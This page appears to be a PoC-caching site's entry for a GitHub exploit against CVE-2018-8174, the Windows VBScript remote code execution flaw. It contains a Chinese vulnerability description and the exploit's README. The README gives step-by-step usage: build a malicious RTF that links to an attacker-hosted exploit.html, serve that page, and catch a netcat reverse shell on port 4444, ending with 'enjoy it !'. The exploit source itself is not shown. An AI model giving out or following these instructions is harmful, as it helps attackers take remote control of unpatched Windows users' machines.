CVE-2018-8174 PoC — Microsoft Windows VBScript引擎缓冲区错误漏洞

Source

https://github.com/lisinan988/CVE-2018-8174-exp

Associated Vulnerability

Title:Microsoft Windows VBScript引擎缓冲区错误漏洞 (CVE-2018-8174)
Description:Microsoft Windows 7等都是美国微软（Microsoft）公司发布的一系列操作系统。Windows VBScript engine是其中的一个VBScript（脚本语言）引擎。 Microsoft Windows VBScript引擎中存在远程代码执行漏洞。远程攻击者可利用该漏洞在当前用户的上下文中执行任意代码，造成内存损坏。以下系统版本受到影响：Microsoft Windows 7，Windows Server 2012 R2，Windows RT 8.1，Windows Server

Readme

# CVE-2018-8174_EXP
usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

Exploit for CVE-2018-8174

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     exp url
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf
  -i IP, --ip IP        ip for netcat
  -p PORT, --port PORT  port for netcat

eg:
1. python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
2. put exploit.html on your server （1.1.1.1）
3. netcat listen  on [any] 4444 (2.2.2.2)

enjoy it !

File Snapshot


 [4.0K]  /data/pocs/63971def905d79ac821c6e7c4fc2c1e6bde75c06
├── [ 19K]  CVE-2018-8174.py
└── [ 585]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!